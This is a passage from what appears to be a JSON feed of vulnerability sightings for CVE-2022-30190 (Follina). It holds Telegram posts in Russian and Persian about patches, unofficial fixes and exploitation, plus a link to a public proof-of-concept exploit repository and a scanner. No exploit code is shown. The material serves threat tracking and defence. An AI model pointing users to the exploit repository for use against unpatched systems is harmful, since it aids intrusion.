ZERO-DAY\n\n\nhttps://github.com/PwnC00re/PoC-CVE-2022-30190", "creation_timestamp": "2022-06-01T03:37:08.000000Z"}, {"uuid": "04111029-4633-4839-8210-d669f44c7419", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/proxy_bar/1190", "content": "\u0420\u0430\u043d\u043e\u0432\u0430\u0442\u043e, \u043d\u043e \u0442\u0430\u043a\u0438 \u0434\u0430\n\u0422\u041e\u041f 10 \u0438\u0437 2022\n\n1. Follina (CVE-2022-30190)\n2. Log4Shell (CVE-2021-44228)\n3. Spring4Shell (CVE-2022-22965)\n4. F5 BIG-IP (CVE-2022-1388)\n5. Google Chrome zero-day (CVE-2022-0609)\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)\n9. Atlassian Confluence RCE flaw (CVE-2022-26134)\n10. Zyxel RCE vulnerability (CVE-2022-30525)", "creation_timestamp": "2022-11-29T06:36:16.000000Z"}, {"uuid": "47ae0439-8683-4f4a-ab7a-85fe4c13df11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/-hSjE6tQsby1bK59117CS79M8pJZfwuegK8pW2OS8URrTA", "content": "", "creation_timestamp": "2022-06-06T13:20:17.000000Z"}, {"uuid": "c0f912e3-1479-48b4-8f98-f6a4e13a56c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/V4aMGqbF9E7u6db2vlWqjJ0xbg8yD-1GzjUeht6dlSqLYG8", "content": "", "creation_timestamp": "2022-09-12T05:42:06.000000Z"}, {"uuid": "315722e1-ab02-4876-b2cf-888125a4c800", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3009", "content": "\u041f\u043e \u0441\u0442\u0430\u0440\u043e\u0439 \u0434\u043e\u0431\u0440\u043e\u0439 \u0442\u0440\u0430\u0434\u0438\u0446\u0438\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e \u0432 \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u0445 Microsoft \u0437\u0430\u043d\u0438\u043c\u0430\u044e\u0442\u0441\u044f \u0432\u0441\u0435, \u043a\u0440\u043e\u043c\u0435 \u0441\u0430\u043c\u043e\u0439 Microsoft.\n\n0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 \u0432 Microsoft Windows Support Diagnostic Tool (MSDT), \u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a Follina, \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0435 \u043d\u0435\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0435 0patch. \n\u00a0\n\u041f\u0430\u0442\u0447 \u0430\u0434\u0430\u043f\u0442\u0438\u0440\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 Windows: Windows 11 v21H2, Windows 10 (\u043e\u0442 v1803 \u0434\u043e v21H2), Windows 7 \u0438 Windows Server 2008 R2\n\n\u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0437\u0430\u0432\u0435\u043b\u0430\u0441\u044c PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0438 \u0443\u0436\u0435 \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0432 \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0435 \u043f\u043e\u0447\u0442\u0438 \u0432\u0441\u0435\u0433\u043e \u043a\u0438\u0431\u0435\u0440\u043f\u043e\u0434\u043f\u043e\u043b\u044c\u044f.\n\n\u0421\u0430\u043c \u0420\u0435\u0434\u043c\u043e\u043d\u0434 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0434\u043e \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043d\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u043d\u0438\u0447\u0435\u0433\u043e, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0448\u0438\u0441\u044c \u043c\u0435\u0440\u0430\u043c\u0438 \u043f\u043e \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u044e \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0439 \u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0430\u0442\u0430\u043a, \u043f\u043e\u0441\u043e\u0432\u0435\u0442\u043e\u0432\u0430\u0432 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u00a0\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b URL-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 MSDT.\n\n\u041e\u0434\u043d\u0430\u043a\u043e 0patch \u043f\u043e\u0448\u043b\u0438 \u043f\u043e \u0434\u0440\u0443\u0433\u043e\u043c\u0443 \u043f\u0443\u0442\u0438, \u0432\u043c\u0435\u0441\u0442\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 URL-\u0430\u0434\u0440\u0435\u0441\u0430 MSDT, \u043e\u043d\u0438 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0438\u00a0\u043e\u0447\u0438\u0441\u0442\u043a\u0443 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u043f\u0443\u0442\u0438 (\u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0438 Windows) \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u0432\u044b\u0432\u043e\u0434\u0430 \u043c\u0430\u0441\u0442\u0435\u0440\u0430 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u043a\u0438 Windows \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u0432 \u041e\u0421 \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439.\n\n0patch \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u043d\u0435 \u0438\u043c\u0435\u0435\u0442 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f, \u043a\u0430\u043a\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f Office \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0430 \u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0430 \u043b\u0438 \u043e\u043d\u0430 \u0432\u043e\u043e\u0431\u0449\u0435: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e\u00a0\u0434\u0440\u0443\u0433\u0438\u0445 \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u0432 \u0430\u0442\u0430\u043a.\n\n\u0427\u0442\u043e\u0431\u044b \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u043c\u0438\u043a\u0440\u043e\u043f\u0430\u0442\u0447 \u0432 Windows \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c 0patch-\u0430\u0433\u0435\u043d\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442 \u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435.\n\n\u041e\u0436\u0438\u0434\u0430\u044e\u0449\u0438\u043c \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0430\u0442\u0447\u0430 \u043e\u0442 Microsoft \u0432 \u043f\u0435\u0440\u0432\u043e\u0439 \u0438\u0442\u0435\u0440\u0430\u0446\u0438\u0438 (\u043a\u043e\u0433\u0434\u0430 \u043e\u043d \u0432\u044b\u0439\u0434\u0435\u0442), \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e \u043d\u0443\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u043e\u0442\u043a\u0430\u0442\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0438 \u0434\u043e\u0436\u0434\u0430\u0442\u044c\u0441\u044f \u043d\u043e\u0432\u044b\u0445 \u0434\u0432\u0443\u0445: \u043e\u0434\u0438\u043d \u0438\u0437 \u043d\u0438\u0445 \u0437\u0430\u043a\u0440\u043e\u0435\u0442 \u043e\u0441\u043d\u043e\u0432\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u0430 \u0432\u0442\u043e\u0440\u043e\u0439 - \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u043e\u0437\u043d\u0438\u043a\u043d\u0435\u0442 \u043f\u043e\u0441\u043b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439.", "creation_timestamp": "2022-06-02T11:31:14.000000Z"}, {"uuid": "644bb2d6-9cd4-4455-9e18-12fdb641c76e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/512", "content": "CVE-2022-30190 : Follina Scanner \nhttps://github.com/ErrorNoInternet/FollinaScanner", "creation_timestamp": "2022-10-03T10:30:15.000000Z"}, {"uuid": "9a81379b-b1bf-41ee-aa69-d51555dd6016", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/true_secator/3060", "content": "Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 PatchTuesday \u0437\u0430 \u0438\u044e\u043d\u044c 2022, \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0432 \u0432 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 55 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0438 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u043e\u0439 \u0432\u0434\u043e\u043b\u044c \u0438 \u043f\u043e\u043f\u0435\u0440\u0435\u043a 0-day Follina.\n\n\u0421\u0440\u0435\u0434\u0438 \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u0445: 3 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 RCE, 51 \u043e\u0442\u043c\u0435\u0447\u0435\u043d\u0430 - \u043a\u0430\u043a \u0432\u0430\u0436\u043d\u0430\u044f \u0438 \u043e\u0434\u043d\u0430 - \u043a\u0430\u043a \u0443\u043c\u0435\u0440\u0435\u043d\u043d\u0430\u044f. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e,\u00a0\u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435 Microsoft Edge \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u044b 5 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n\n\u041e\u0431\u0449\u0435\u0435 \u0440\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c: 12 - \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439; 1 - \u043e\u0431\u0445\u043e\u0434\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, 27 - RCE, 11 - \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, 3 - \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438, 1 - \u0441\u043f\u0443\u0444\u0438\u043d\u0433. \u041f\u043e\u043b\u043d\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u0432 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0437\u0434\u0435\u0441\u044c.\n\n\u0413\u043b\u0430\u0432\u043d\u044b\u043c \u0434\u043e\u0441\u0442\u0438\u0436\u0435\u043d\u0438\u0435\u043c \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043f\u0430\u0442\u0447\u0430 \u0441\u0442\u0430\u043b\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 Follina, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434 PowerShell \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c Windows Microsoft Diagnostic Tool (MSDT) \u043f\u043e\u0441\u043b\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 Word.\n\n\u041f\u043e\u043c\u0438\u043c\u043e CVE-2022-30190 \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u0440\u0443\u0433\u0438\u0445 RCE \u0432 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows (CVE-2022-30136), Windows Hyper-V (CVE-2022-30163), Windows Lightweight Directory Access Protocol, Microsoft Office, HEVC \u0438 Azure RTOS GUIX Studio.\n\n\u0415\u0449\u0435 \u043e\u0434\u043d\u0438\u043c \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u043c \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u043c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f\u00a0CVE-2022-30147\u00a0(\u0441 \u043e\u0446\u0435\u043d\u043a\u043e\u0439 CVSS 7,8), \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u043c \u0441\u043e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0435 Windows \u0438 \u0441 \u043e\u0442\u043c\u0435\u0442\u043a\u043e\u0439 Microsoft - \u00ab\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0431\u043e\u043b\u0435\u0435 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u0430\u044f\u00bb.\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u0440\u0430\u0434\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441\u0438\u043b\u044c\u043d\u043e \u043d\u0435 \u0441\u0442\u043e\u0438\u0442, \u0432\u0435\u0434\u044c \u043f\u043e\u043c\u043d\u0438\u0442\u044c\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440\u0430\u00a0\u043e\u0447\u0435\u0440\u0435\u0434\u0438\u00a0\u043f\u0435\u0447\u0430\u0442\u0438\u00a0\u0432\u044b\u0445\u043e\u0434\u0438\u043b \u0441 \u044f\u043d\u0432\u0430\u0440\u044f 2022 \u0447\u0443\u0442\u044c \u043b\u0438 \u043d\u0435 \u043a\u0430\u0436\u0434\u044b\u0439 \u043c\u0435\u0441\u044f\u0446, \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435\u043c \u0441\u0442\u0430\u043b \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043f\u0430\u0442\u0447, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0434\u043e\u0431\u0438\u043b\u0438 \u0431\u0430\u0433\u0443. \u041d\u043e \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u043d\u0435 \u0444\u0430\u043a\u0442.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c, \u043a\u043e\u043d\u0435\u0447\u043d\u043e, Microsoft \u0432 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u0440\u0430\u0437 \u043e\u0431\u043b\u0430\u0436\u0430\u043b\u0438\u0441\u044c: \u0435\u0441\u043b\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0437\u0430\u043d\u044f\u043b\u043e 2 \u043d\u0435\u0434\u0435\u043b\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438, \u0442\u043e\u0433\u0434\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0432\u043e\u043f\u0440\u043e\u0441, \u0430 \u043f\u043e\u0447\u0435\u043c\u0443 \u043e\u043d\u043e \u043d\u0435 \u0432\u044b\u0448\u043b\u043e \u0440\u0430\u043d\u044c\u0448\u0435, \u0432\u0435\u0434\u044c \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0435 \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u0435\u0449\u0435 \u0432 \u0430\u043f\u0440\u0435\u043b\u0435. \u041d\u043e \u043e\u0442\u0432\u0435\u0442 \u0432\u044b \u0443\u0436\u0435 \u0437\u043d\u0430\u0435\u0442\u0435.", "creation_timestamp": "2022-06-15T16:10:07.000000Z"}, {"uuid": "8ad1605e-5738-425d-acc6-dacc72612279", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/190", "content": "\u0647\u0634\u062f\u0627\u0631!\n\n\u0646\u0648\u0628\u062a\u06cc \u0647\u0645 \u0628\u0627\u0634\u0647 \u0627\u06cc\u0646 \u0628\u0627\u0631 \u0646\u0648\u0628\u062a \u0645\u0627\u06a9\u0631\u0648\u0633\u0627\u0641\u062a\u0650!\n\n\u0631\u0648\u0632 \u06af\u0630\u0634\u062a\u0647 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0645\u0647\u0645 \u062f\u06cc\u06af\u0631\u06cc \u062f\u0631 \u0627\u0628\u0632\u0627\u0631 Diagnosis \u0648\u06cc\u0646\u062f\u0648\u0632 \u0645\u0628\u062a\u06cc \u0628\u0631 \u0634\u0646\u0627\u0633\u0647 CVE-2202-30190 \u062a\u0648\u0633\u0637 \u0628\u062e\u0634 \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u06cc\u0646 \u0634\u0631\u06a9\u062a\u060c \u062e\u0628\u0631\u0633\u0627\u0632 \u0634\u062f.\n\u0627\u06cc\u0646 \u0636\u0639\u0641 \u0627\u0645\u0646\u06cc\u062a\u06cc \u06a9\u0647 \u0628\u0647 \"Follina\" \u0645\u0639\u0631\u0648\u0641 \u0627\u0633\u062a \u062f\u0631 \u0627\u0628\u0632\u0627\u0631 MSDT \u06cc\u0627 Diagnostic Tools \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f\u0647 \u06a9\u0647 \u0628\u0631\u0627\u06cc \u06a9\u0627\u0647\u0634 \u062e\u0637\u0631 \u0648 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0641\u0646\u06cc \u0628\u06cc\u0634\u062a\u0631 \u062f\u0631 \u0627\u06cc\u0646 \u062e\u0635\u0648\u0635 \u0645\u06cc \u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0647 \u0644\u06cc\u0646\u06a9 \u0631\u0633\u0645\u06cc \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a \u0645\u0631\u0627\u062c\u0639\u0647 \u0646\u0645\u0627\u06cc\u06cc\u062f.\n\u062c\u0632\u0626\u06cc\u0627\u062a \u0631\u0633\u0645\u06cc: https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "creation_timestamp": "2022-05-31T20:54:26.000000Z"}, {"uuid": "5e064c8f-2fe2-4e15-869a-55709df96bd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/true_secator/3129", "content": "\u041d\u0430\u0441\u0442\u0443\u043f\u0430\u0442\u044c \u043d\u0430 \u0442\u0435 \u0436\u0435 \u0433\u0440\u0430\u0431\u043b\u0438 \u0432 \u043c\u0438\u0440\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 - \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u0430\u044f \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0430, \u0430 \u201c\u043b\u0430\u0442\u0430\u0442\u044c \u0434\u044b\u0440\u044b\u201d \u043f\u043e\u0440\u043e\u0439, \u0441\u0442\u043e\u0438\u0442 \u0431\u043e\u043b\u0435\u0435 \u043e\u0441\u043d\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e. \n\n\u0421\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043e \u0447\u0435\u043c \u0440\u0435\u0447\u044c, \u0430 \u0432\u043e\u0442 \u043e \u0447\u0435\u043c: \u043f\u043e \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430\u043c \u0430\u043d\u0430\u043b\u0438\u0437\u0430 Google Project Zero \u0437\u0430 \u043f\u0435\u0440\u0432\u0443\u044e \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0443 2022 \u0433\u043e\u0434\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e \u0432 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 18 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f, \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0430 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u043d\u0435 \u0431\u044b\u043b\u0438 \u0434\u043e\u043b\u0436\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b.\n\n\u041f\u043e \u0441\u043b\u043e\u0432\u0430\u043c \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u0430 \u041c\u044d\u0434\u0434\u0438 \u0421\u0442\u043e\u0443\u043d\u0430 9 \u0438\u0437 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 0-day, \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0432\u0448\u0438\u0445\u0441\u044f \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0432 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443, \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c, \u0435\u0441\u043b\u0438 \u0431\u044b \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0441\u043d\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u0430 4 \u043e\u0448\u0438\u0431\u043a\u0438 2022 \u0433\u043e\u0434\u0430 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u043c\u0438 \u043d\u0443\u043b\u0435\u0432\u044b\u0445 \u0434\u043d\u0435\u0439 2021 \u0433\u043e\u0434\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\n\u0421\u0430\u043c\u0430\u044f \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u0438\u0437 \u044d\u0442\u0438\u0445 